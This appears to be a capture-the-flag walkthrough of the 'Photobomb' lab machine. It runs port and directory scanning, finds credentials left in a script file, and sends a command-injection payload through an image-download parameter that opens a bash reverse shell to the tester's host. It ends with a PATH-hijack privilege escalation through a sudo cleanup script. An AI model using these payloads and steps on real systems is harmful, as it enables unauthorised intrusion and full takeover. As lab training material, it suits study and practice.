Port recognition withnmap

┌──(root@ghost)-[/home/ghost]
└─# nmap photobomb.htb --min-rate 5000 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 13:26 EDT
Nmap scan report for photobomb.htb (10.10.11.182)
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 18.42 seconds

nmap reports two open ports

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c --hc=404 -t 100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://photobomb.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://photobomb.htb/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================
                                                                              
000000489:   401        7 L      12 W       188 Ch      "printer"                                                                                                                          
000001227:   401        7 L      12 W       188 Ch      "printers"                                                                                                                         
000004295:   401        7 L      12 W       188 Ch      "printerfriendly"                                                                                                                  
000008558:   401        7 L      12 W       188 Ch      "printer_friendly"                                                                                                                 
000013496:   401        7 L      12 W       188 Ch      "printer_icon"                                                                                                                     
000015253:   401        7 L      12 W       188 Ch      "printer-icon"                                                                                                                     
000015485:   401        7 L      12 W       188 Ch      "printer-friendly"                                                                                                                 
000021900:   401        7 L      12 W       188 Ch      "printerFriendly"                                                                                                                  
000045240:   200        22 L     95 W       843 Ch      "http://photobomb.htb/"                                                                                                            
000047897:   401        7 L      12 W       188 Ch      "printersupplies"                                                                                                                  
000051765:   401        7 L      12 W       188 Ch      "printer1"                                                                                                                         
000052471:   401        7 L      12 W       188 Ch      "printer2"                                                                                                                         
000084465:   401        7 L      12 W       188 Ch      "printericon"                                                                                                                      
000105794:   401        7 L      12 W       188 Ch      "printer_2867"                                                                                                                     
000112086:   401        7 L      12 W       188 Ch      "printer_securit"                                                                                                                  
000154189:   401        7 L      12 W       188 Ch      "printer_drivers"                                                                                                                  
000159305:   401        7 L      12 W       188 Ch      "printer_2"                                                                                                                        
000192008:   401        7 L      12 W       188 Ch      "printer_list"                                                                                                                     
000203184:   401        7 L      12 W       188 Ch      "printerdrivers"                                                                                                                   
000208002:   401        7 L      12 W       188 Ch      "printer-ink"                                                                                                                      

Total time: 0
Processed Requests: 220560
Filtered Requests: 220526
Requests/sec.: 0
┌──(root@ghost)-[/home/ghost]
└─# curl http://photobomb.htb
<!DOCTYPE html>
<html>
<head>
  <title>Photobomb</title>
  <link type="text/css" rel="stylesheet" href="styles.css" media="all" />
  <script src="photobomb.js"></script>
</head>
<body>
  <div id="container">
    <header>
      <h1><a href="/">Photobomb</a></h1>
    </header>
    <article>
      <h2>Welcome to your new Photobomb franchise!</h2>
      <p>You will soon be making an amazing income selling premium photographic gifts.</p>
      <p>This state of-the-art web application is your gateway to this fantastic new life. Your wish is its command.</p>
      <p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
      <p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>
    </article>
  </div>
</body>
</html>

After inspecting the source code we found photobomb.js

┌──(root@ghost)-[/home/ghost]
└─# curl http://photobomb.htb/photobomb.js
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

Credentials found user pH0t0 and password b0Mb!

We need to intercept requests with burpsuite to see what is happening when we click on download photo to print button

Let's try if concatenating with a semicolon we can execute commands by sending a ping to our machine

We receive it, let's try to get a shell

Our payload looks like this

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;bash%20-c%20%27bash%20-i%20>%26%20/dev/tcp/10.10.14.142/1337%200>%261%27%26&dimensions=3000x2000
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.142] from photobomb.htb [10.10.11.182] 45828
bash: cannot set terminal process group (723): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
0d42366432da822cff563ded442b9646

After foward the request we are in the system as wizard user, time to privesc

wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

As we can see the last find command is not being called from his absolute path, this can be abused

wizard@photobomb:~/photobomb$ echo '/bin/bash' > /tmp/find;chmod +x /tmp/find;sudo PATH=/tmp:$PATH /opt/cleanup.sh
whoami
root
cat /root/root.txt
e33b84a2e9104d5d04f1f186359ad12e